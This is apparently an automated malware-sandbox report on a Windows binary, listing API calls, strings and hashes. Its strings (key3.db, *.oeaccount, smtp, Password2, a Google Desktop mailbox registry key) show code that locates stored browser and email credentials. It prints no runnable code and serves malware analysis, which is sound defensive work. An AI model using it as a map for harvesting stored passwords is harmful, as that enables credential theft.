                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2374668499-0
                                                                                                                  • Opcode ID: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                  • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                                  • Opcode Fuzzy Hash: c223344c3a39cb50a824543c0933464b2b2e3202265bd74e385ec46d38a17b1f
                                                                                                                  • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040AD5B
                                                                                                                  • memset.MSVCRT ref: 0040AD71
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                  • sprintf.MSVCRT ref: 0040ADA8
                                                                                                                  Strings
                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AD76
                                                                                                                  • <%s>, xrefs: 0040ADA2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                  • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                  • API String ID: 3699762281-1998499579
                                                                                                                  • Opcode ID: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                                                  • Instruction ID: d8254de8a9900f2911fb5d1c0b13fc0cc865a5027b69882d7a9a790f368f6919
                                                                                                                  • Opcode Fuzzy Hash: f08f26e7c6bf1a33ee1b85fc51aa9ff2daee10922a246ae1c01303c1338e46c2
                                                                                                                  • Instruction Fuzzy Hash: 49012B7294012877E721A719CC46FDABB6C9F54304F0500F7B50DF3082DBB8AB508BA4
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A3E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A4C
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A5D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A74
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A7D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                  • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                                  • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                                  • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A3E
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A4C
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A5D
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A74
                                                                                                                    • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76270A60,?,00000000), ref: 00409A7D
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                                  • free.MSVCRT ref: 00409B00
                                                                                                                    • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2241099983-0
                                                                                                                  • Opcode ID: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                  • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                                  • Opcode Fuzzy Hash: 2269fc206d2d283b797854ae73677064badd7dde056db72ab5a07573cc1b8c0d
                                                                                                                  • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                    • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                    • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                  • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                  • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2775283111-0
                                                                                                                  • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                  • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                  • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                  • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                  • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                                    • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                    • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID: Ul@$key3.db
                                                                                                                  • API String ID: 1968906679-1563549157
                                                                                                                  • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                  • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                  • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                  • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                  APIs
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                  • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                  • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi$_mbscpy
                                                                                                                  • String ID: smtp
                                                                                                                  • API String ID: 2625860049-60245459
                                                                                                                  • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                  • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                  • memset.MSVCRT ref: 00408258
                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                  Strings
                                                                                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$EnumOpenmemset
                                                                                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                  • API String ID: 2255314230-2212045309
                                                                                                                  • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                  • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C28C
                                                                                                                  • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FocusMessagePostmemset
                                                                                                                  • String ID: S_@$l
                                                                                                                  • API String ID: 3436799508-4018740455
                                                                                                                  • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                  • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                  • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                  • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy
                                                                                                                  • String ID: C^@$X$ini
                                                                                                                  • API String ID: 714388716-917056472
                                                                                                                  • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                  • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                  • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                  • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                  • String ID: MS Sans Serif
                                                                                                                  • API String ID: 3492281209-168460110
                                                                                                                  • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                  • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_strcmpimemset
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 275601554-2167791130
                                                                                                                  • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                  • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_mbscat
                                                                                                                  • String ID: 3CD
                                                                                                                  • API String ID: 3951308622-1938365332
                                                                                                                  • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                  • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                  • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                  • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscat$_mbscpy
                                                                                                                  • String ID: Password2
                                                                                                                  • API String ID: 2600922555-1856559283
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,76270A60,?,00000000), ref: 00410D1C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                  • API String ID: 2574300362-543337301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: rows deleted
                                                                                                                  • API String ID: 2221118986-571615504
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3384217055-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1860491036-0
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004048C2
                                                                                                                  • memset.MSVCRT ref: 004048D6
                                                                                                                  • memset.MSVCRT ref: 004048EA
                                                                                                                  • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                  • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 368790112-0
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D2C2
                                                                                                                  • memset.MSVCRT ref: 0040D2D8
                                                                                                                  • memset.MSVCRT ref: 0040D2EA
                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                  • memset.MSVCRT ref: 0040D319
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 368790112-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                  • too many SQL variables, xrefs: 0042C6FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                  • API String ID: 2221118986-515162456
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                  • memset.MSVCRT ref: 004026AD
                                                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                    • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                    • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                  • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3503910906-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00407948: free.MSVCRT ref: 0040794B
                                                                                                                    • Part of subcall function 00407948: free.MSVCRT ref: 00407953
                                                                                                                  • free.MSVCRT ref: 00407D7C
                                                                                                                    • Part of subcall function 00407A1F: free.MSVCRT ref: 00407A2E
